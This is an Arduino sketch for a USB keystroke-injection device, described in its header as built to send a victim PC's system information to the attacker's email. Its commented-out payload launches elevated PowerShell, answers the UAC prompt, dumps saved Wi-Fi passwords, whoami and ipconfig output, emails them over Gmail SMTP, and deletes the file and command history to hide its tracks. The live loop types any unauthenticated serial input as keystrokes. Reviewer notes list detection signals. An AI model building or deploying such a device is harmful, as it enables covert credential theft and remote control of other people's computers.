mailduck.ino
/*
* Created by ryspom to collect valuable system information and send it back to the attacker's email address.
* It should work with Windows 7, but it has only been tested on Windows 10 machines (works perfectly!).
*/
#include "Keyboard.h"
// Tap one key on the emulated keyboard: press it, hold it for 50 ms, then release it.
void typeKey(int key)
{
    const unsigned long holdMs = 50;

    Keyboard.press(key);
    delay(holdMs);
    Keyboard.release(key);
}
// Type the given text through the emulated keyboard, then tap Return to submit it.
// Everything passed here reaches the host as ordinary keystrokes in whatever window has focus.
void command(char command[])
{
    Keyboard.print(command);

    // Same press / 50 ms hold / release sequence that typeKey() performs.
    Keyboard.press(KEY_RETURN);
    delay(50);
    Keyboard.release(KEY_RETURN);
}
// Hold Left Ctrl, add Esc, release both, then pause one second so the Windows menu can load.
void openWindowsMenu()
{
    const int chord[] = {KEY_LEFT_CTRL, KEY_ESC};

    for (int i = 0; i < 2; i++) {
        Keyboard.press(chord[i]);
        delay(80);
    }
    Keyboard.releaseAll();

    delay(1000); // wait for the quick Windows menu to load
}
// Press two keys as a chord: key1 first, key2 50 ms later, then release everything.
// NOTE(review): both parameters are declared char[] yet are handed straight to
// Keyboard.press(), and the disabled caller in setup() passes integer key codes.
// Confirm the intended parameter type.
void twoKeyCombination(char key1[],char key2[])
{
    const unsigned long gapMs = 50;

    Keyboard.press(key1);
    delay(gapMs);

    Keyboard.press(key2);
    delay(gapMs);

    Keyboard.releaseAll();
}
// Press three keys as a chord, 50 ms apart and in argument order, then release everything.
// NOTE(review): the parameters are declared char[] yet are handed straight to
// Keyboard.press(). Confirm the intended parameter type.
void threeKeyCombination(char key1[],char key2[], char key3[])
{
    char *keys[] = {key1, key2, key3};

    for (int i = 0; i < 3; i++) {
        Keyboard.press(keys[i]);
        delay(50);
    }
    Keyboard.releaseAll();
}
// Drive the focused window's system menu (Alt+Space, then "m" for Move) and hold the
// left arrow for four seconds so the window slides off the visible desktop.
// The only call to this helper in the file is commented out.
void moveWindowOffScreen()
{
    const unsigned long chordGapMs = 80;
    const unsigned long moveModeMs = 100;
    const unsigned long slideMs = 4000;
    const unsigned long settleMs = 300;

    // Open the window manipulation menu.
    Keyboard.press(KEY_LEFT_ALT);
    delay(chordGapMs);
    Keyboard.write(0x20); // ASCII space; not a modifier key, so write() is used rather than press()
    delay(chordGapMs);
    Keyboard.releaseAll();

    // "m" selects Move directly; no Return is needed to confirm the menu entry.
    Keyboard.write('m');
    delay(moveModeMs); // wait for the window to enter "move" mode

    // Hold the arrow long enough for the window to leave the screen.
    Keyboard.press(KEY_LEFT_ARROW);
    delay(slideMs);
    Keyboard.releaseAll();

    // Return commits the new position.
    typeKey(KEY_RETURN);
    delay(settleMs);
}
// Blink the LED on pin 2 once: 300 ms on, then 300 ms off (blocks for about 600 ms in total).
void blinkLed()
{
    const int ledPin = 2;
    const int levels[] = {HIGH, LOW};

    for (int i = 0; i < 2; i++) {
        digitalWrite(ledPin, levels[i]);
        delay(300);
    }
}
/* Init function */
/*
 * One-time initialisation. Configures the enable button (A2) and the LED (pin 2), opens
 * Serial1 and Serial at 115200 baud and, when A2 reads LOW, enters the payload branch.
 *
 * As written, the whole payload, including Keyboard.begin(), sits inside a block comment.
 * The only live statement in that branch is Keyboard.end(), so nothing is typed at boot.
 *
 * What the disabled payload would do on the host, for anyone triaging such a device:
 *  - open the Run dialog and start an elevated PowerShell, answering the UAC prompt with Alt+Y;
 *  - build a Net.Mail.SmtpClient for smtp.gmail.com port 587 with the sender's mailbox
 *    credentials typed into the console in clear text;
 *  - write whoami output, saved Wi-Fi profile keys (netsh ... key=clear) and ipconfig output
 *    to reportfile.txt in the shell's working directory;
 *  - mail that file as an attachment, delete it, and clear the console history with Alt+F7.
 *
 * Host-side signals this sequence leaves: a new USB HID keyboard enumerating, PowerShell
 * launched elevated from the Run dialog, "netsh wlan show profile ... key=clear" in process
 * or PowerShell logging, and outbound SMTP submission on port 587 from a workstation.
 * The typed credentials would also appear in PowerShell logging where it is enabled.
 */
void setup()
{
pinMode(A2, INPUT); // Added a pushbutton at pin A2(connected to GND with 10KOhm pulldown resistor and VCC)
pinMode(2,OUTPUT); // added a LED for output
Serial1.begin(115200); // Serial1 MUST be used(instead of Serial. This is a leonardo specific requirement)
Serial.begin(115200); // Debug Serial to be used from PC connected with usb cable
// Hardware interlock: the payload branch is taken only while the button is NOT pressed.
if(digitalRead(A2)==LOW){ // if the key is pressed, the value is HIGH and the script doesnt run!
// Begining the Keyboard stream
// Everything from here to the closing comment marker is disabled code, kept byte-for-byte.
/*
Keyboard.begin();
delay(2000);
int guiKey1 = 131; // Library code for GUI key(windows/osx button)
int guiKey2 = 114; // Ascii code for r
twoKeyCombination(guiKey1,guiKey2); // open "run" dialog
command("powershell Start-Process powershell -Verb runAs");
delay(1500); // wait for the powershell to open
Keyboard.press(KEY_LEFT_ALT); // reply yes to User Account Control Screen
Keyboard.press('y');
Keyboard.releaseAll();
delay(300);
typeKey(KEY_RETURN);
delay(2000); // wait untill the system recognises y is not a command, or until powershell opens
//moveWindowOffScreen();
command("$SMTPServer = 'smtp.gmail.com'");
command("$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)");
command("$SMTPInfo.EnableSsl = $true");
command("$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('YOUR_EMAIL_USERNAME', 'YOUR_EMAIL_PASSWORD');");
command("$ReportEmail = New-Object System.Net.Mail.MailMessage");
command("$ReportEmail.From = 'YOUR_EMAIL_ADDRESS'");
command("$ReportEmail.To.Add(RECIPIENTS_EMAIL_ADDRESS')");
command("clear");
twoKeyCombination(KEY_LEFT_ALT,KEY_F7); // cmd and powershell history(commands) is erased with Alt+F7
command("$ReportEmail.Subject = 'Duck Machine Report'");
command("$ReportEmail.Body = 'Duck Email Successfully Sent from Rubber-Duckied PC!Check the attachments for system data/info.'");
command("echo \"This is a file automatically generated on the target pc by the ducky script.\" > reportfile.txt"); // signle > because we do not want to append, we want to create the file
command("echo \"whoami results:\" >> reportfile.txt");
command("whoami >> reportfile.txt");
command("echo \"WIFI PASSWORDS!\" >> reportfile.txt");
command("(netsh wlan show profiles) | Select-String \"\\:(.+)$\" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=\"$name\" key=clear)} | Select-String \"Key Content\\W+\\:(.+)$\" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize >> reportfile.txt");
//THE ABOVE ONE-LINER was found on https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---Data-Exfiltration---Backdoor
command("echo \"ipconfig results\" >> reportfile.txt");
command("ipconfig >> reportfile.txt");
command("$ReportEmail.Attachments.Add('reportfile.txt')"); // dump every useful info in that file and attach it to the email
command("$SMTPInfo.Send($ReportEmail)");
command("del reportfile.txt"); // hide our tracks a bit, after powershell has exited -> email has been sent(can cause trouble)
command("exit");
*/
// NOTE(review): Keyboard.begin() is inside the disabled block above, so this end() has no matching begin().
Keyboard.end();
}
}
/* Main loop: blinks the LED and replays commands received on Serial1 as keystrokes */
/*
 * Runs repeatedly. Each pass blinks the LED once (about 600 ms of blocking delay) and then,
 * if bytes are waiting on Serial1, reads them as one string and dispatches on its
 * three-character prefix:
 *   cmd - type the content and press Return      prt - type the content only
 *   wrt - Keyboard.write() the content           prs - press the numeric key code and hold it
 *   pr1 - press the key code, release after 100 ms
 *   rls - release all keys                       dbg - no keyboard action
 *   anything else - the whole received string is typed as-is
 *
 * Nothing in this block checks who is on the other end of Serial1: whatever arrives there
 * is replayed to the host as keyboard input. Every command is also echoed to the USB debug
 * port (Serial).
 */
void loop(){
blinkLed();
if (Serial1.available() > 0) {
String serialstring = Serial1.readString(); // it can be 63 characters long MAX!
String typeOfCommand = serialstring.substring(0,3); // the first three characters indicate the type of the command(e.g. "wrt" in "wrt=")
String commandContent = serialstring.substring(4); // everything after the fourth character (index 3, the separator, is skipped)
// NOTE(review): the array below has length() elements, but toCharArray() is told the buffer
// holds length()+1, so the terminating NUL would land one byte past the end. Confirm, and
// size the array length()+1 if so.
char commandContentChar[commandContent.length()];
commandContent.toCharArray(commandContentChar,(commandContent.length()+1)); // doesnt return anything, just copies the result in the first argument
int commandContentInt = commandContent.toInt(); // convert string to integer(long)
// Debug echo of the parsed command on the USB serial port.
Serial.println("----------------------New Command----------------------");
Serial.print("serialstring=");
Serial.println(serialstring);
Serial.print("typeofcommand=");
Serial.println(typeOfCommand);
Serial.print("commandContent=");
Serial.println(commandContent);
Serial.print("commandContentChar=");
Serial.println(commandContentChar);
Serial.print("commandContentInt=");
Serial.println(commandContentInt);
if(typeOfCommand=="cmd"){ // command mode. Types a command and then presses the Return key
Keyboard.print(commandContent);
typeKey(KEY_RETURN);
}
else if(typeOfCommand=="prt"){ // print mode. Just prints the output wherever the cursor's at.
Keyboard.print(commandContent);
}
else if(typeOfCommand=="wrt"){ // write mode. Writes a single key, both a modifier and a letter/symbol one.
// NOTE(review): a char array, not a single key code, is passed to write() here. Confirm which overload is intended.
Keyboard.write(commandContentChar);
}
else if(typeOfCommand=="prs"){ // press mode. Presses a modifier Key(and does not release it until an rls comes.
Keyboard.press(commandContentInt); // accepts modifier key codes(see mailduck's readme.md) and ASCII codes
}
else if(typeOfCommand=="pr1"){ // press-and-then-release mode. Presses a key, holds it for 100 ms, then releases that same key.
Keyboard.press(commandContentInt); // accepts modifier key codes(see mailduck's readme.md) and ASCII codes
delay(100);
Keyboard.release(commandContentInt);
}
else if(typeOfCommand=="rls"){ // release mode. Releases all the pressed modifier keys.
Keyboard.releaseAll();
}
else if(typeOfCommand=="dbg"){
//do nothing. "dbg" stands for Debug and it is to be used for debug of the nodeMCU through an USB
}
else{
// Unrecognised prefix: the raw string, prefix included, is typed on the host.
Keyboard.print(serialstring);
}
}
}